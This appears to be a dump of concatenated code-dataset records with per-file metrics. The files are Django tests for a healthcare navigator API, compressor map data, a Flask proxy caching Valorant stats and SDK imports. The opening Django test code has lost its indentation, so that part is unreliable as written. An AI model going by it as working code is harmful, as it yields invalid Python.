status_data = response_data["Status"]
# Test decoded JSON data for "Status" key
self.assertIsNotNone(status_data)
self.assertNotIn("Errors", status_data)
self.assertEqual(status_data["Error Code"], 0)
self.assertIn("Data", response_data)
self.assertNotEqual(len(response_data["Data"]), 0)
# Test decoded JSON data for correct API version
self.assertEqual(status_data["Version"], 2.0)
# Test decoded JSON data for non empty "Next Available Appointments" data
staff_data = response_data["Data"]
self.assertIn("row", staff_data)
if "row" in staff_data:
db_row = staff_data['row']
self.assertEqual(
db_row['first_name'],
post_data['first_name'],
"row name: {}, request name: {}".format(db_row['first_name'], post_data['first_name'])
)
self.assertEqual(
len(db_row['base_locations']),
2,
"row base locations count: {}".format(len(db_row['base_locations']))
)
self.assertEqual(
len(db_row["approved_clients_for_case_management"]),
1,
"row approved_clients_for_case_management count: {}".format(len(db_row["approved_clients_for_case_management"]))
)
self.assertEqual(
len(db_row['healthcare_locations_worked']),
1,
"row healthcare_locations_worked count: {}".format(len(db_row['healthcare_locations_worked']))
)
self.assertEqual(
len(db_row['insurance_carrier_specialties']),
1,
"row insurance_carrier_specialties count: {}".format(len(db_row['insurance_carrier_specialties']))
)
self.assertEqual(
len(db_row['healthcare_service_expertises']),
1,
"row healthcare_service_expertises count: {}".format(len(db_row['healthcare_service_expertises']))
)
self.assertEqual(
len(db_row['resume_info']),
1,
"row resume count: {}".format(len(db_row['resume_info']))
)
def test_update_navigator_view(self):
post_data = {
"first_name": "sdfdsfafassadr",
"last_name": "Marlsasdfsdfdsfdsfdda",
"email": "donadsfdsfa@patfdsfdie.org",
"type": "Navigator",
"county": "Montgomery",
"mpn": "Cook",
"add_base_locations": ['Lincoln Belmont Library', 'Thorek Memorial Hospital'],
'add_healthcare_locations_worked': [
{
'name': 'Edward Hospital & Immediate Careasdss',
'state_province': 'not available'
}
],
'add_healthcare_service_expertises': [
'bariatrics',
],
'add_insurance_carrier_specialties': [
{
'name': 'Health Alliance Medical Plans, Inc.',
'state_province': 'il'
},
],
'add_approved_clients_for_case_management': [
1
],
"create_resume_row": {
"profile_description": "apple",
"create_education_rows": [
{
"school": "easy",
"major": "peasy",
"degree_type": "masters"
},
{
"school": "lemon",
"major": "squeezy",
"degree_type": "masters"
},
],
"create_job_rows": [
{
"title": "easy",
"company": "peasy",
"description": "masters"
},
{
"title": "lemon",
"company": "squeezy",
"description": "masters"
},
],
},
"address_line_1": "",
"address_line_2": "",
"city": "",
"state_province": "",
"zipcode": "",
"phone": "2813307004",
"reported_region": "cook",
"video_link": "https://www.twitch.tv/videos/239858398",
"navigator_organization": "sljidsjflksa",
"db_action": "update",
"id": 5,
}
post_json = json.dumps(post_data)
response = self.client_object.put(self.base_url, post_json, content_type="application/json")
# Test for a valid reponse code (200)
self.assertEqual(response.status_code, 200)
response_json = response.content.decode('utf-8')
response_data = json.loads(response_json)
# Test for valid decoded json data from response body
self.assertIsNotNone(response_data)
status_data = response_data["Status"]
# Test decoded JSON data for "Status" key
self.assertIsNotNone(status_data)
self.assertNotIn("Errors", status_data)
self.assertEqual(status_data["Error Code"], 0)
self.assertIn("Data", response_data)
self.assertNotEqual(len(response_data["Data"]), 0)
# Test decoded JSON data for correct API version
self.assertEqual(status_data["Version"], 2.0)
# Test decoded JSON data for non empty "Next Available Appointments" data
staff_data = response_data["Data"]
self.assertIn("row", staff_data)
if "row" in staff_data:
db_row = staff_data['row']
self.assertEqual(
db_row['first_name'],
post_data['first_name'],
"row name: {}, request name: {}".format(db_row['first_name'], post_data['first_name'])
)
self.assertEqual(
len(db_row['base_locations']),
2,
"row base locations count: {}".format(len(db_row['base_locations']))
)
self.assertEqual(
len(db_row["approved_clients_for_case_management"]),
1,
"row approved_clients_for_case_management count: {}".format(len(db_row["approved_clients_for_case_management"]))
)
self.assertEqual(
len(db_row['healthcare_locations_worked']),
1,
"row healthcare_locations_worked count: {}".format(len(db_row['healthcare_locations_worked']))
)
self.assertEqual(
len(db_row['insurance_carrier_specialties']),
1,
"row insurance_carrier_specialties count: {}".format(len(db_row['insurance_carrier_specialties']))
)
self.assertEqual(
len(db_row['healthcare_service_expertises']),
1,
"row healthcare_service_expertises count: {}".format(len(db_row['healthcare_service_expertises']))
)
self.assertEqual(
len(db_row['resume_info']),
1,
"row resume count: {}".format(len(db_row['resume_info']))
)
class NavigatorSignUpAPITests(TestCase, BaseV2RqstTests):
def setUp(self):
self.base_url += "navigator_sign_up/"
def test_add_navigator_view(self):
post_data = {
"first_name": "sdfdsfafassadr",
"last_name": "Marlsasdfsdfdsfdsfdda",
"email": "donadsfdsfa@patfdsfdie.org",
'add_healthcare_locations_worked': [
{
'name': 'Edward Hospital & Immediate Careasdss',
'state_province': 'not available'
}
],
'add_healthcare_service_expertises': [
'bariatrics',
],
'add_insurance_carrier_specialties': [
{
'name': 'Health Alliance Medical Plans, Inc.',
'state_province': 'il'
},
],
"create_resume_row": {
"profile_description": "apple",
"create_education_rows": [
{
"school": "easy",
"major": "peasy",
"degree_type": "masters"
},
{
"school": "lemon",
"major": "squeezy",
"degree_type": "masters"
},
],
"create_job_rows": [
{
"title": "easy",
"company": "peasy",
"description": "masters"
},
{
"title": "lemon",
"company": "squeezy",
"description": "masters"
},
],
},
"address_line_1": "",
"address_line_2": "",
"city": "",
"state_province": "",
"zipcode": "",
"phone": "2813307004",
"reported_region": "cook",
"video_link": "https://www.twitch.tv/videos/239858398",
"navigator_organization": "sakfjnlsa",
"db_action": "create",
}
post_json = json.dumps(post_data)
response = self.client_object.put(self.base_url, post_json, content_type="application/json")
# Test for a valid reponse code (200)
self.assertEqual(response.status_code, 200)
response_json = response.content.decode('utf-8')
response_data = json.loads(response_json)
# Test for valid decoded json data from response body
self.assertIsNotNone(response_data)
status_data = response_data["Status"]
# Test decoded JSON data for "Status" key
self.assertIsNotNone(status_data)
self.assertNotIn("Errors", status_data)
self.assertEqual(status_data["Error Code"], 0)
self.assertIn("Data", response_data)
self.assertNotEqual(len(response_data["Data"]), 0)
# Test decoded JSON data for correct API version
self.assertEqual(status_data["Version"], 2.0)
# Test decoded JSON data for non empty "Next Available Appointments" data
staff_data = response_data["Data"]
self.assertIn("row", staff_data)
if "row" in staff_data:
db_row = staff_data['row']
self.assertEqual(
db_row['first_name'],
post_data['first_name'],
"row name: {}, request name: {}".format(db_row['first_name'], post_data['first_name'])
)
self.assertEqual(
db_row['navigator_organization'],
post_data['navigator_organization'],
"row name: {}, request name: {}".format(db_row['navigator_organization'], post_data['navigator_organization'])
)
self.assertEqual(
len(db_row['base_locations']),
0,
"row base locations count: {}".format(len(db_row['base_locations']))
)
self.assertEqual(
len(db_row['healthcare_locations_worked']),
1,
"row healthcare_locations_worked count: {}".format(len(db_row['healthcare_locations_worked']))
)
self.assertEqual(
len(db_row['insurance_carrier_specialties']),
1,
"row insurance_carrier_specialties count: {}".format(len(db_row['insurance_carrier_specialties']))
)
self.assertEqual(
len(db_row['healthcare_service_expertises']),
1,
"row healthcare_service_expertises count: {}".format(len(db_row['healthcare_service_expertises']))
)
self.assertEqual(
len(db_row['resume_info']),
1,
"row resume count: {}".format(len(db_row['resume_info']))
)
| 36.48227 | 128 | 0.495658 | 1,314 | 15,432 | 5.547184 | 0.122527 | 0.030868 | 0.037317 | 0.046646 | 0.964467 | 0.964467 | 0.951571 | 0.943339 | 0.928248 | 0.928248 | 0 | 0.012771 | 0.391135 | 15,432 | 422 | 129 | 36.56872 | 0.762984 | 0.047952 | 0 | 0.771831 | 0 | 0 | 0.305805 | 0.116517 | 0 | 0 | 0 | 0 | 0.135211 | 1 | 0.014085 | false | 0 | 0.011268 | 0 | 0.030986 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
01cf7e3cec4eb237fb2c84b2306385c2e6676021 | 212 | py | Python | tests/conftest.py | sharebears/pulsar-forums | 6c1152a181c30bb82c49556fd072f47c2eeaf1cb | [
"MIT"
] | null | null | null | tests/conftest.py | sharebears/pulsar-forums | 6c1152a181c30bb82c49556fd072f47c2eeaf1cb | [
"MIT"
] | null | null | null | tests/conftest.py | sharebears/pulsar-forums | 6c1152a181c30bb82c49556fd072f47c2eeaf1cb | [
"MIT"
] | null | null | null | import forums
from core.conftest import * # noqa: F401, F403
from core.conftest import PLUGINS, POPULATORS
from forums.test_data import ForumsPopulator
PLUGINS.append(forums)
POPULATORS.append(ForumsPopulator)
| 26.5 | 47 | 0.825472 | 27 | 212 | 6.444444 | 0.518519 | 0.091954 | 0.183908 | 0.252874 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031746 | 0.108491 | 212 | 7 | 48 | 30.285714 | 0.888889 | 0.075472 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
bf180d4bfdacfad1c581f524d922c0161c8c877d | 9,276 | py | Python | pycycle/maps/CFM56_LPC_map.py | swryan/pyCycleOld | fbab35b74d0e5487abe686ae0823ff52e75afb3b | ["Apache-2.0"]
import numpy as np
from pycycle.maps.map_data import MapData
"""Python version of CFM56 LPC map from NPSS"""
LPCmap = MapData()
# Map design point values
LPCmap.defaults = {}
LPCmap.defaults['alphaMap'] = 0.0
LPCmap.defaults['NcMap'] = 1.00
LPCmap.defaults['PR'] = 1.969
LPCmap.defaults['RlineMap'] = 2.150
LPCmap.RlineStall = 1.0
LPCmap.alphaMap = np.array([0.000, 90.000])
LPCmap.NcMap = np.array([0.300, 0.400, 0.500, 0.600, 0.700, 0.750, 0.800, 0.850, 0.900, 0.950, 1.000, 1.050, 1.100, 1.150])
LPCmap.RlineMap = np.array([1.000, 1.200, 1.400, 1.600, 1.800, 2.000, 2.200, 2.400, 2.600, 2.800, 3.000])
LPCmap.WcMap = np.array([[[17.907, 19.339, 20.749, 22.136, 23.498, 24.833, 26.141, 27.420, 28.669, 29.887, 31.011],
[24.951, 26.742, 28.485, 30.177, 31.815, 33.397, 34.921, 36.385, 37.788, 39.128, 40.405],
[32.682, 34.715, 36.662, 38.520, 40.286, 41.958, 43.533, 45.011, 46.390, 47.669, 48.848],
[40.927, 43.115, 45.168, 47.083, 48.858, 50.492, 51.983, 53.331, 54.539, 55.607, 56.537],
[49.850, 52.122, 54.195, 56.068, 57.741, 59.215, 60.494, 61.580, 62.479, 63.197, 63.739],
[54.798, 57.066, 59.099, 60.897, 62.463, 63.800, 64.913, 65.810, 66.497, 66.983, 67.278],
[60.051, 62.252, 64.185, 65.851, 67.255, 68.405, 69.307, 69.973, 70.413, 70.638, 70.675],
[65.313, 67.427, 69.262, 70.824, 72.118, 73.153, 73.938, 74.484, 74.803, 74.907, 74.907],
[70.995, 72.902, 74.542, 75.920, 77.043, 77.920, 78.560, 78.974, 79.174, 79.198, 79.198],
[77.441, 78.904, 80.155, 81.199, 82.042, 82.690, 83.151, 83.434, 83.545, 83.548, 83.548],
[84.344, 85.211, 85.952, 86.572, 87.074, 87.460, 87.735, 87.903, 87.967, 87.968, 87.968],
[89.305, 89.687, 90.025, 90.320, 90.572, 90.783, 90.953, 91.083, 91.174, 91.227, 91.243],
[93.626, 93.712, 93.793, 93.868, 93.939, 94.004, 94.064, 94.120, 94.170, 94.216, 94.257],
[96.084, 96.074, 96.064, 96.054, 96.044, 96.033, 96.022, 96.012, 96.000, 95.989, 95.978]],
[[17.907, 19.339, 20.749, 22.136, 23.498, 24.833, 26.141, 27.420, 28.669, 29.887, 31.011],
[24.951, 26.742, 28.485, 30.177, 31.815, 33.397, 34.921, 36.385, 37.788, 39.128, 40.405],
[32.682, 34.715, 36.662, 38.520, 40.286, 41.958, 43.533, 45.011, 46.390, 47.669, 48.848],
[40.927, 43.115, 45.168, 47.083, 48.858, 50.492, 51.983, 53.331, 54.539, 55.607, 56.537],
[49.850, 52.122, 54.195, 56.068, 57.741, 59.215, 60.494, 61.580, 62.479, 63.197, 63.739],
[54.798, 57.066, 59.099, 60.897, 62.463, 63.800, 64.913, 65.810, 66.497, 66.983, 67.278],
[60.051, 62.252, 64.185, 65.851, 67.255, 68.405, 69.307, 69.973, 70.413, 70.638, 70.675],
[65.313, 67.427, 69.262, 70.824, 72.118, 73.153, 73.938, 74.484, 74.803, 74.907, 74.907],
[70.995, 72.902, 74.542, 75.920, 77.043, 77.920, 78.560, 78.974, 79.174, 79.198, 79.198],
[77.441, 78.904, 80.155, 81.199, 82.042, 82.690, 83.151, 83.434, 83.545, 83.548, 83.548],
[84.344, 85.211, 85.952, 86.572, 87.074, 87.460, 87.735, 87.903, 87.967, 87.968, 87.968],
[89.305, 89.687, 90.025, 90.320, 90.572, 90.783, 90.953, 91.083, 91.174, 91.227, 91.243],
[93.626, 93.712, 93.793, 93.868, 93.939, 94.004, 94.064, 94.120, 94.170, 94.216, 94.257],
[96.084, 96.074, 96.064, 96.054, 96.044, 96.033, 96.022, 96.012, 96.000, 95.989, 95.978]]])
LPCmap.effMap = np.array([[[.8070, .8291, .8461, .8566, .8586, .8497, .8170, .7410, .6022, .3674, .0000],
[.8230, .8454, .8628, .8741, .8775, .8708, .8419, .7732, .6477, .4372, .0916],
[.8411, .8631, .8805, .8921, .8966, .8918, .8671, .8065, .6959, .5124, .2168],
[.8565, .8783, .8957, .9077, .9131, .9099, .8883, .8338, .7340, .5696, .3083],
[.8662, .8879, .9055, .9179, .9239, .9219, .9024, .8520, .7600, .6096, .3739],
[.8699, .8917, .9093, .9218, .9281, .9265, .9080, .8598, .7721, .6297, .4089],
[.8743, .8957, .9130, .9253, .9316, .9304, .9131, .8678, .7858, .6538, .4519],
[.8836, .9026, .9179, .9287, .9342, .9331, .9183, .8804, .8128, .7065, .5485],
[.8943, .9103, .9230, .9319, .9362, .9351, .9231, .8930, .8406, .7602, .6442],
[.9060, .9169, .9253, .9310, .9334, .9321, .9236, .9036, .8703, .8211, .7529],
[.9170, .9224, .9264, .9288, .9293, .9280, .9231, .9127, .8962, .8730, .8423],
[.9159, .9171, .9176, .9177, .9171, .9159, .9136, .9097, .9042, .8968, .8876],
[.9061, .9059, .9055, .9052, .9047, .9042, .9036, .9028, .9018, .9007, .8994],
[.8962, .8964, .8965, .8966, .8967, .8968, .8969, .8970, .8971, .8972, .8973]],
[[.8070, .8291, .8461, .8566, .8586, .8497, .8170, .7410, .6022, .3674, .0000],
[.8230, .8454, .8628, .8741, .8775, .8708, .8419, .7732, .6477, .4372, .0916],
[.8411, .8631, .8805, .8921, .8966, .8918, .8671, .8065, .6959, .5124, .2168],
[.8565, .8783, .8957, .9077, .9131, .9099, .8883, .8338, .7340, .5696, .3083],
[.8662, .8879, .9055, .9179, .9239, .9219, .9024, .8520, .7600, .6096, .3739],
[.8699, .8917, .9093, .9218, .9281, .9265, .9080, .8598, .7721, .6297, .4089],
[.8743, .8957, .9130, .9253, .9316, .9304, .9131, .8678, .7858, .6538, .4519],
[.8836, .9026, .9179, .9287, .9342, .9331, .9183, .8804, .8128, .7065, .5485],
[.8943, .9103, .9230, .9319, .9362, .9351, .9231, .8930, .8406, .7602, .6442],
[.9060, .9169, .9253, .9310, .9334, .9321, .9236, .9036, .8703, .8211, .7529],
[.9170, .9224, .9264, .9288, .9293, .9280, .9231, .9127, .8962, .8730, .8423],
[.9159, .9171, .9176, .9177, .9171, .9159, .9136, .9097, .9042, .8968, .8876],
[.9061, .9059, .9055, .9052, .9047, .9042, .9036, .9028, .9018, .9007, .8994],
[.8962, .8964, .8965, .8966, .8967, .8968, .8969, .8970, .8971, .8972, .8973]]])
LPCmap.PRmap = np.array([[[1.0678, 1.0649, 1.0613, 1.0571, 1.0522, 1.0468, 1.0402, 1.0322, 1.0227, 1.0117, 1.0000],
[1.1239, 1.1186, 1.1122, 1.1047, 1.0962, 1.0865, 1.0751, 1.0611, 1.0445, 1.0257, 1.0045],
[1.1994, 1.1910, 1.1809, 1.1691, 1.1558, 1.1409, 1.1233, 1.1020, 1.0771, 1.0488, 1.0173],
[1.2981, 1.2855, 1.2706, 1.2533, 1.2339, 1.2122, 1.1869, 1.1563, 1.1210, 1.0811, 1.0370],
[1.4289, 1.4111, 1.3899, 1.3655, 1.3380, 1.3076, 1.2720, 1.2295, 1.1804, 1.1254, 1.0654],
[1.5118, 1.4909, 1.4661, 1.4375, 1.4052, 1.3695, 1.3278, 1.2779, 1.2205, 1.1565, 1.0868],
[1.6070, 1.5827, 1.5538, 1.5205, 1.4831, 1.4417, 1.3934, 1.3358, 1.2697, 1.1962, 1.1165],
[1.7160, 1.6881, 1.6555, 1.6183, 1.5767, 1.5312, 1.4785, 1.4160, 1.3448, 1.2660, 1.1808],
[1.8402, 1.8086, 1.7724, 1.7318, 1.6869, 1.6381, 1.5824, 1.5170, 1.4430, 1.3615, 1.2736],
[1.9930, 1.9587, 1.9206, 1.8788, 1.8336, 1.7852, 1.7309, 1.6685, 1.5988, 1.5225, 1.4405],
[2.1593, 2.1257, 2.0899, 2.0518, 2.0117, 1.9695, 1.9235, 1.8724, 1.8163, 1.7557, 1.6909],
[2.2764, 2.2510, 2.2248, 2.1978, 2.1701, 2.1416, 2.1118, 2.0801, 2.0464, 2.0108, 1.9735],
[2.3771, 2.3664, 2.3557, 2.3448, 2.3339, 2.3229, 2.3118, 2.3004, 2.2887, 2.2768, 2.2646],
[2.4343, 2.4365, 2.4387, 2.4409, 2.4430, 2.4452, 2.4473, 2.4495, 2.4516, 2.4538, 2.4559]],
[[1.0678, 1.0649, 1.0613, 1.0571, 1.0522, 1.0468, 1.0402, 1.0322, 1.0227, 1.0117, 1.0000],
[1.1239, 1.1186, 1.1122, 1.1047, 1.0962, 1.0865, 1.0751, 1.0611, 1.0445, 1.0257, 1.0045],
[1.1994, 1.1910, 1.1809, 1.1691, 1.1558, 1.1409, 1.1233, 1.1020, 1.0771, 1.0488, 1.0173],
[1.2981, 1.2855, 1.2706, 1.2533, 1.2339, 1.2122, 1.1869, 1.1563, 1.1210, 1.0811, 1.0370],
[1.4289, 1.4111, 1.3899, 1.3655, 1.3380, 1.3076, 1.2720, 1.2295, 1.1804, 1.1254, 1.0654],
[1.5118, 1.4909, 1.4661, 1.4375, 1.4052, 1.3695, 1.3278, 1.2779, 1.2205, 1.1565, 1.0868],
[1.6070, 1.5827, 1.5538, 1.5205, 1.4831, 1.4417, 1.3934, 1.3358, 1.2697, 1.1962, 1.1165],
[1.7160, 1.6881, 1.6555, 1.6183, 1.5767, 1.5312, 1.4785, 1.4160, 1.3448, 1.2660, 1.1808],
[1.8402, 1.8086, 1.7724, 1.7318, 1.6869, 1.6381, 1.5824, 1.5170, 1.4430, 1.3615, 1.2736],
[1.9930, 1.9587, 1.9206, 1.8788, 1.8336, 1.7852, 1.7309, 1.6685, 1.5988, 1.5225, 1.4405],
[2.1593, 2.1257, 2.0899, 2.0518, 2.0117, 1.9695, 1.9235, 1.8724, 1.8163, 1.7557, 1.6909],
[2.2764, 2.2510, 2.2248, 2.1978, 2.1701, 2.1416, 2.1118, 2.0801, 2.0464, 2.0108, 1.9735],
[2.3771, 2.3664, 2.3557, 2.3448, 2.3339, 2.3229, 2.3118, 2.3004, 2.2887, 2.2768, 2.2646],
[2.4343, 2.4365, 2.4387, 2.4409, 2.4430, 2.4452, 2.4473, 2.4495, 2.4516, 2.4538, 2.4559]]])
#LPCmap.Nc_data, LPCmap.alpha_data, LPCmap.Rline_data = np.meshgrid(LPCmap.Nc_vals, LPCmap.alpha_vals, LPCmap.Rline_vals, sparse=False)
LPCmap.Npts = LPCmap.NcMap.size
LPCmap.units = {}
LPCmap.units['NcMap'] = 'rpm'
LPCmap.units['WcMap'] = 'lbm/s'
# format for new regular grid interpolator:
LPCmap.param_data = []
LPCmap.output_data = []
LPCmap.param_data.append({'name': 'alphaMap', 'values': LPCmap.alphaMap,
'default': 0, 'units': None})
LPCmap.param_data.append({'name': 'NcMap', 'values': LPCmap.NcMap,
'default': 1.0, 'units': 'rpm'})
LPCmap.param_data.append({'name': 'RlineMap', 'values': LPCmap.RlineMap,
'default': 2.15, 'units': None})
LPCmap.output_data.append({'name': 'WcMap', 'values': LPCmap.WcMap,
'default': np.mean(LPCmap.WcMap), 'units': 'lbm/s'})
LPCmap.output_data.append({'name': 'effMap', 'values': LPCmap.effMap,
'default': np.mean(LPCmap.effMap), 'units': None})
LPCmap.output_data.append({'name': 'PRmap', 'values': LPCmap.PRmap,
'default': 1.969, 'units': None})
| 69.744361 | 135 | 0.590448 | 1,807 | 9,276 | 3.02269 | 0.317654 | 0.015379 | 0.015379 | 0.011534 | 0.820762 | 0.80227 | 0.80227 | 0.789454 | 0.789454 | 0.789454 | 0 | 0.566336 | 0.153299 | 9,276 | 132 | 136 | 70.272727 | 0.129106 | 0.021453 | 0 | 0.631579 | 0 | 0 | 0.024152 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.017544 | 0 | 0.017544 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
bf2f97bfbb5d736580c0d9ee860fbfb8836a4a37 | 163 | py | Python | backend/api/admin.py | s1071539/hj-quotation | 6181e4a715fae296697b27bf013434d986b10585 | [
"MIT"
] | null | null | null | backend/api/admin.py | s1071539/hj-quotation | 6181e4a715fae296697b27bf013434d986b10585 | [
"MIT"
] | null | null | null | backend/api/admin.py | s1071539/hj-quotation | 6181e4a715fae296697b27bf013434d986b10585 | [
"MIT"
] | null | null | null | from django.contrib import admin
from backend.api.models import User, Product
admin.site.register(User)
admin.site.register(Product) | 27.166667 | 38 | 0.834356 | 25 | 163 | 5.44 | 0.48 | 0.161765 | 0.205882 | 0.294118 | 0.382353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08589 | 163 | 6 | 39 | 27.166667 | 0.912752 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1725538a3473560ab34b5372bca4d9200369b842 | 191 | py | Python | ramda/nth_arg_test.py | jakobkolb/ramda.py | 982b2172f4bb95b9a5b09eff8077362d6f2f0920 | [
"MIT"
] | 56 | 2018-08-06T08:44:58.000Z | 2022-03-17T09:49:03.000Z | ramda/nth_arg_test.py | jakobkolb/ramda.py | 982b2172f4bb95b9a5b09eff8077362d6f2f0920 | [
"MIT"
] | 28 | 2019-06-17T11:09:52.000Z | 2022-02-18T16:59:21.000Z | ramda/nth_arg_test.py | jakobkolb/ramda.py | 982b2172f4bb95b9a5b09eff8077362d6f2f0920 | [
"MIT"
] | 5 | 2019-09-18T09:24:38.000Z | 2021-07-21T08:40:23.000Z | from ramda.nth_arg import nth_arg
from ramda.private.asserts import *
def nth_arg_test():
assert_equal(nth_arg(1)("a", "b", "c"), "b")
assert_equal(nth_arg(-1)("a", "b", "c"), "c")
| 23.875 | 49 | 0.633508 | 34 | 191 | 3.323529 | 0.441176 | 0.265487 | 0.247788 | 0.300885 | 0.371681 | 0.371681 | 0.371681 | 0.371681 | 0 | 0 | 0 | 0.01227 | 0.146597 | 191 | 7 | 50 | 27.285714 | 0.680982 | 0 | 0 | 0 | 0 | 0 | 0.041885 | 0 | 0 | 0 | 0 | 0 | 0.6 | 1 | 0.2 | true | 0 | 0.4 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
175650b2ca3e1f451192e36d672e2d1c5b9d6535 | 5,317 | py | Python | api/server.py | seen-idc/valorant-stats-bot | fd3392300f5b7c5b23668023dc9e12a53237f367 | [
"MIT"
] | 1 | 2021-11-06T11:30:19.000Z | 2021-11-06T11:30:19.000Z | api/server.py | seen-idc/valorant-stats-bot | fd3392300f5b7c5b23668023dc9e12a53237f367 | [
"MIT"
] | null | null | null | api/server.py | seen-idc/valorant-stats-bot | fd3392300f5b7c5b23668023dc9e12a53237f367 | [
"MIT"
] | null | null | null | import time
from flask import Flask, request, jsonify
import pickledb
import requests

app = Flask(__name__)
app.config['JSON_SORT_KEYS'] = False

db = pickledb.load('server.db', True)

API_BASE = 'https://api.henrikdev.xyz'


def cached_fetch(db_query, url, ttl):
    """Fetch `url` and cache the JSON body for `ttl` seconds.

    The fetch timestamp is stored under `db_query` and the response body
    under `db_query + ':data'`, so repeated requests inside the TTL are
    served from the local database instead of hitting the upstream API.
    (The original per-route copies checked the `:data` key but never wrote
    it, so cached responses were never actually returned.)
    """
    data_key = '{}:data'.format(db_query)
    now = time.time()
    if db.exists(db_query) and now - db.get(db_query) <= ttl and db.exists(data_key):
        return jsonify(db.get(data_key))
    req = requests.get(url)
    data = req.json()
    db.set(db_query, now)
    db.set(data_key, data)
    return jsonify(data)


@app.route('/valorant/user')
def get_profile():
    username = request.args.get('name')
    tag = request.args.get('tag')
    db_query = 'user:{}:{}'.format(username, tag)
    url = '{}/valorant/v1/account/{}/{}'.format(API_BASE, username, tag)
    return cached_fetch(db_query, url, 900)


@app.route('/valorant/mmr-history')
def get_mmr_hist():
    username = request.args.get('name')
    tag = request.args.get('tag')
    region = request.args.get('region')
    db_query = 'mmrhist:{}:{}:{}'.format(region, username, tag)
    url = '{}/valorant/v1/mmr-history/{}/{}/{}'.format(API_BASE, region, username, tag)
    return cached_fetch(db_query, url, 1500)


@app.route('/valorant/matches')
def get_match_hist():
    username = request.args.get('name')
    tag = request.args.get('tag')
    region = request.args.get('region')
    match_filter = request.args.get('filter')  # renamed to avoid shadowing the builtin
    db_query = 'matchhist:{}:{}:{}:{}'.format(region, username, tag, match_filter)
    url = '{}/valorant/v3/matches/{}/{}/{}?filter={}&size=10'.format(
        API_BASE, region, username, tag, match_filter)
    return cached_fetch(db_query, url, 1500)


@app.route('/valorant/store-featured')
def get_bundle():
    return cached_fetch('bundle', '{}/valorant/v1/store-featured'.format(API_BASE), 21600)


@app.route('/valorant/mmr')
def get_mmr():
    username = request.args.get('name')
    tag = request.args.get('tag')
    region = request.args.get('region')
    db_query = 'mmr:{}:{}:{}'.format(region, username, tag)
    url = '{}/valorant/v2/mmr/{}/{}/{}'.format(API_BASE, region, username, tag)
    return cached_fetch(db_query, url, 900)
| 39.385185 | 144 | 0.590182 | 680 | 5,317 | 4.536765 | 0.095588 | 0.090762 | 0.048622 | 0.092383 | 0.895948 | 0.885575 | 0.885575 | 0.885575 | 0.885575 | 0.885575 | 0 | 0.009704 | 0.224751 | 5,317 | 134 | 145 | 39.679104 | 0.738719 | 0 | 0 | 0.798319 | 0 | 0 | 0.215911 | 0.012413 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042017 | false | 0 | 0.033613 | 0 | 0.243697 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
176706a787d2b9140c407fa9e5d070d4028c4ac9 | 11,042 | py | Python | accelbyte_py_sdk/api/lobby/wrappers/__init__.py | AccelByte/accelbyte-python-sdk | dcd311fad111c59da828278975340fb92e0f26f7 | [
"MIT"
] | null | null | null | accelbyte_py_sdk/api/lobby/wrappers/__init__.py | AccelByte/accelbyte-python-sdk | dcd311fad111c59da828278975340fb92e0f26f7 | [
"MIT"
] | 1 | 2021-10-13T03:46:58.000Z | 2021-10-13T03:46:58.000Z | accelbyte_py_sdk/api/lobby/wrappers/__init__.py | AccelByte/accelbyte-python-sdk | dcd311fad111c59da828278975340fb92e0f26f7 | [
"MIT"
] | null | null | null | # Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: justice_py_sdk_codegen/__main__.py
"""Auto-generated package that contains models used by the justice-lobby-server."""
__version__ = "staging"
__author__ = "AccelByte"
__email__ = "dev@accelbyte.net"
# pylint: disable=line-too-long
from ._chat import admin_chat_history
from ._chat import admin_chat_history_async
from ._chat import get_personal_chat_history_v1_public
from ._chat import get_personal_chat_history_v1_public_async
from ._chat import personal_chat_history
from ._chat import personal_chat_history_async
from ._config import admin_export_config_v1
from ._config import admin_export_config_v1_async
from ._config import admin_get_all_config_v1
from ._config import admin_get_all_config_v1_async
from ._config import admin_get_config_v1
